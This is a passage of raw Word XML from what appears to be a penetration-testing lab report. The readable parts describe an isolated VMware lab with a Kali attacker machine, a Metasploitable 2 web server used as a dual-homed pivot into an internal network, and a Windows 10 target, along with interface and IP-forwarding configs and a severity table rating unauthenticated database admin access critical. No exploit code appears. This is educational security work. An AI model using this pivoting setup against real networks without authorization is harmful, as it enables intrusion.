              </w:rPr>
              <w:t>—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unauthenticated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access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="double" w:sz="2" w:space="0" w:color="D0D7E3"/>
            </w:tcBorders>
            <w:shd w:fill="FFF0F0" w:color="000000" w:val="clear"/>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="136" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:lef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C0392B"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-129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C0392B"/>
                <w:b/>
                <w:bCs/>
                <w:spacing w:val="-17"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="145" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="120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Full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DB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admin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access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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329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3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4" w:name="4"/>
    <w:bookmarkEnd w:id="4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214" w:after="0" w:line="322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58"/>
          <w:noProof/>
        </w:rPr>
      </w:pP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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2.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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Lab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2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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Setup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38"/>
          <w:noProof/>
        </w:rPr>
        <w:t>&amp;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33"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Network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8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0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Topology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3" coordorigin="1292,1450" coordsize="9901,19" o:spt="12" path="m1292,1460l11193,1460">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 83" type="Shape 83" style="position:absolute;left:0;text-align:left;margin-left:63.58pt;width:497.07pt;height:2.96pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3816" filled="f" stroked="t" strokeweight="0.96pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="341" w:after="0" w:line="25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66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2.1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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Network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1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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Architecture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6" coordorigin="1052,2045" coordsize="10141,10" o:spt="12" path="m1052,2050l11193,2050">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 106" type="Shape 106" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:29pt;mso-position-vertical-relative:paragraph;z-index:3817" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105" w:after="0" w:line="255" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="353"/>
        <w:jc w:val="left"/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dual-network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virtualized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environment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provisioned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VMware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simulate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segmented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corporate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network.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Two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isolated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Host-Only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vLANs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were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created,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bridged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by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dual-homed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instance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acting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as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web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server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/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pivot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point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105" w:after="0" w:line="255" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="353"/>
        <w:jc w:val="left"/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373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2" w:space="0" w:color="D0D7E3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802"/>
        <w:gridCol w:w="6562"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="681" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2802" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="34" w:line="240" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="160" w:right="120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71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8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>External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7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21"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network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8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6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(vLAN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3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:tcW w:w="6562" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1791"/>
              </w:tabs>
              <w:spacing w:before="116" w:after="0" w:line="219" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="158"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:color w:val="#222222"/>
                <w:spacing w:val="1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192.168.50.0/24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7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54"/>
                <w:noProof/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:color w:val="#222222"/>
                <w:spacing w:val="2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>vLan1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="682" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2802" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="29" w:line="240" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="160" w:right="194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71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8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Internal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7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22"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network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8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6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(vLAN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3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6562" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1556"/>
              </w:tabs>
              <w:spacing w:before="117" w:after="0" w:line="219" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="158"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:color w:val="#222222"/>
                <w:spacing w:val="1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10.10.10.0/24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59"/>
                <w:noProof/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:color w:val="#222222"/>
                <w:spacing w:val="2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>vLan2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="437" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2802" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="161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27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21"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Attacker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3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9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="6562" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1179"/>
                <w:tab w:val="left" w:pos="1506"/>
              </w:tabs>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="158"/>
              <w:jc w:val="left"/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Kali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Linux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2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>→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192.168.50.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="439" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2802" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="161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94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7"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vulnerable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6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4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Web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2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6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="6562" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1803"/>
                <w:tab w:val="left" w:pos="2129"/>
                <w:tab w:val="left" w:pos="4071"/>
                <w:tab w:val="left" w:pos="4244"/>
              </w:tabs>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="158"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:color w:val="#222222"/>
                <w:spacing w:val="-4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0"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Metasploitable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0"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2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>→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192.168.50.3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0"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(eth0)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>|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0"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.10.10.5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(eth1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="437" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1B3A5C" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="2802" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="161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17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8"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Internal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4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20"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F5F7FA" w:color="000000" w:val="clear"/>
            <w:vAlign w:val="center"/>
            <w:tcW w:w="6562" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="3166"/>
                <w:tab w:val="left" w:pos="3492"/>
              </w:tabs>
              <w:spacing w:before="0" w:after="0" w:line="211" w:lineRule="exact"/>
              <w:ind w:firstLine="1" w:left="158"/>
              <w:jc w:val="left"/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0"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Windows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10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Employee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System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>→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10.10.10.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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4.00pt;width:441.00pt;height:393.00pt;z-index:3911;mso-position-horizontal-relative:page;margin-top:10pt;mso-position-vertical-relative:paragraph;">
            <v:imagedata r:id="rId_vQLC" o:title="Image96"/>
          </v:shape>
        </w:pict>
      </w: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0" w:after="0" w:line="32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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="259" w:after="0" w:line="25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5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2.2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Virtual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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Machine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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Configuration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44" coordorigin="1052,14635" coordsize="10141,10" o:spt="12" path="m1052,14640l11193,14640">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 344" type="Shape 344" style="position:absolute;left:0;text-align:left;margin-left:51.58pt;width:509.07pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:25pt;mso-position-vertical-relative:paragraph;z-index:3910" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="324" w:after="0" w:line="183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4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14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324" w:after="0" w:line="183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5" w:name="5"/>
    <w:bookmarkEnd w:id="5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196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4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2.2.1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Kali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Linux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(Attacker)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="90" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="346"/>
        <w:jc w:val="left"/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One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network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adapter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assigned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VMnet2.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6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file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modified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set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static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IP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route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traffic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through</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#333333"/>
          <w:spacing w:val="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bridge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="90" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="346"/>
        <w:jc w:val="left"/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34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7" coordorigin="1095,2280" coordsize="9363,2262" o:spt="12" path="m1095,2280l10458,2280l10458,4542l1095,4542">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 197" type="Shape 197" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:115.09pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:-251657496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0" coordorigin="1080,2280" coordsize="29,2262" o:spt="12" path="m1095,2280l1095,4542">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 350" type="Shape 350" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:115.09pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3826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1" coordorigin="1080,2271" coordsize="9373,10" o:spt="12" path="m1080,2276l10453,2276">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 351" type="Shape 351" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3827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2" coordorigin="10453,2271" coordsize="10,2271" o:spt="12" path="m10458,2271l10458,4542">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 352" type="Shape 352" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:115.57pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3830" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="175" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="5646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# </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="#6A9955"/>
          <w:spacing w:val="-1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>/etc/network/interfaces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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—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Kali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Linux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auto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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>eth0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="-461" w:left="1114" w:right="7457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iface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eth0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inet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static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address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192.168.50.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="1114" w:right="7116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netmask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255.255.255.0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gateway</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="19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192.168.50.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="192" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="3165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Route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through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Metasploitable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bridge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="250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3" coordorigin="1080,4542" coordsize="9373,10" o:spt="12" path="m1080,4547l10453,4547">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 353" type="Shape 353" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:-4pt;mso-position-vertical-relative:paragraph;z-index:3834" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="221" w:after="0" w:line="221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Screenshot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placeholder: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Kali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Linux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ifconfig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/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ip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addr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output</w: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06" coordorigin="1090,5641" coordsize="10065,4672" o:spt="12" path="m1090,5641l11155,5641l11155,10313l1090,10313">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 406" type="Shape 406" style="position:absolute;left:0;text-align:left;margin-left:53.50pt;width:505.23pt;height:235.59pt;mso-position-horizontal-relative:page;margin-top:4pt;mso-position-vertical-relative:paragraph;z-index:-251657474" filled="t" fillcolor="#F0FAFF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07" coordorigin="1078,5627" coordsize="14,4686" o:spt="12" path="m1085,5627l1085,10313">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 407" type="Shape 407" style="position:absolute;left:0;text-align:left;margin-left:52.90pt;width:2.72pt;height:236.31pt;mso-position-horizontal-relative:page;margin-top:4pt;mso-position-vertical-relative:paragraph;z-index:3840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08" coordorigin="1095,5625" coordsize="10050,14" o:spt="12" path="m1095,5632l11145,5632">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 408" type="Shape 408" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:4pt;mso-position-vertical-relative:paragraph;z-index:3842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09" coordorigin="11143,5627" coordsize="14,4686" o:spt="12" path="m11150,5627l11150,10313">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 409" type="Shape 409" style="position:absolute;left:0;text-align:left;margin-left:556.14pt;width:2.72pt;height:236.31pt;mso-position-horizontal-relative:page;margin-top:4pt;mso-position-vertical-relative:paragraph;z-index:-251657468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214.00pt;z-index:3877;mso-position-horizontal-relative:page;margin-top:3pt;mso-position-vertical-relative:paragraph;">
            <v:imagedata r:id="rId_Vzmc" o:title="Image104"/>
          </v:shape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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="458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10" coordorigin="1095,10311" coordsize="10050,14" o:spt="12" path="m1095,10318l11145,10318">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 410" type="Shape 410" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:504.52pt;height:2.72pt;mso-position-horizontal-relative:page;margin-top:-2pt;mso-position-vertical-relative:paragraph;z-index:3850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1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2.2.2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Metasploitable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2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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>(Bridge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5"/>
          <w:noProof/>
        </w:rPr>
        <w:t>/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Pivot)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="86" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="584"/>
        <w:jc w:val="left"/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Two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adapters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were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assigned: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eth0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VMnet2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(external)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eth1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VMnet3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(internal).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IP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forwarding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enabled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allow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machine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route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packets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between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both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subnets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="34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9" coordorigin="1095,12186" coordsize="9363,2473" o:spt="12" path="m1095,12186l10458,12186l10458,14659l1095,14659">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 589" type="Shape 589" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:125.65pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:-251657458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59" coordorigin="1080,12186" coordsize="29,2473" o:spt="12" path="m1095,12186l1095,14659">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 759" type="Shape 759" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:125.65pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3865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60" coordorigin="1080,12176" coordsize="9373,10" o:spt="12" path="m1080,12181l10453,12181">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 760" type="Shape 760" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3866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61" coordorigin="10453,12176" coordsize="10,2483" o:spt="12" path="m10458,12176l10458,14659">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 761" type="Shape 761" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:126.13pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3869" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="495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/etc/network/interfaces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—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Metasploitable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2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6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External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interface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auto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eth0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="-461" w:left="1114" w:right="7457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iface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eth0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inet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static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address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192.168.50.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="1114" w:right="7116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netmask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255.255.255.0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gateway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192.168.50.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="8" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7687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Internal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interface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auto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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>eth1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="293" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="-100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62" coordorigin="1080,14659" coordsize="9373,10" o:spt="12" path="m1080,14664l10453,14664">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 762" type="Shape 762" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3873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5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6" w:name="6"/>
    <w:bookmarkEnd w:id="6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95,1090" coordsize="9363,2045" o:spt="12" path="m1095,1090l10458,1090l10458,3135l1095,3135">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 57" type="Shape 57" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:104.27pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:-251657496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5" coordorigin="1080,1090" coordsize="29,2045" o:spt="12" path="m1095,1090l1095,3135">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 225" type="Shape 225" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:104.27pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3825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6" coordorigin="1080,1080" coordsize="9373,10" o:spt="12" path="m1080,1085l10453,1085">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 226" type="Shape 226" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3826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7" coordorigin="10453,1080" coordsize="10,2055" o:spt="12" path="m10458,1080l10458,3135">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 227" type="Shape 227" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:104.75pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3829" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="313" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="-461" w:left="1114" w:right="7457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iface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eth1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inet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static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address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10.10.10.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="461" w:left="653" w:right="7116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netmask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255.255.255.0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5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Enable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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>IP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forwarding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20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echo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1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/proc/sys/net/ipv4/ip_forward</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="5407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Persist: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uncomment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in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/etc/sysctl.conf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net.ipv4.ip_forward=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="5407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8" coordorigin="1080,3135" coordsize="9373,10" o:spt="12" path="m1080,3140l10453,3140">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 228" type="Shape 228" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:-4pt;mso-position-vertical-relative:paragraph;z-index:3833" filled="f" stroked="t" strokeweight="0.48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" coordorigin="1090,3567" coordsize="10065,5094" o:spt="12" path="m1090,3567l11155,3567l11155,8662l1090,8662">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 229" type="Shape 229" style="position:absolute;left:0;text-align:left;margin-left:53.50pt;width:505.23pt;height:256.71pt;mso-position-horizontal-relative:page;margin-top:6pt;mso-position-vertical-relative:paragraph;z-index:-251657475" filled="t" fillcolor="#F0FAFF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0" coordorigin="1078,3558" coordsize="14,5104" o:spt="12" path="m1085,3558l1085,8662">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 230" type="Shape 230" style="position:absolute;left:0;text-align:left;margin-left:52.90pt;width:2.72pt;height:257.19pt;mso-position-horizontal-relative:page;margin-top:5pt;mso-position-vertical-relative:paragraph;z-index:3839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1" coordorigin="1095,3555" coordsize="10050,14" o:spt="12" path="m1095,3563l11145,3563">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
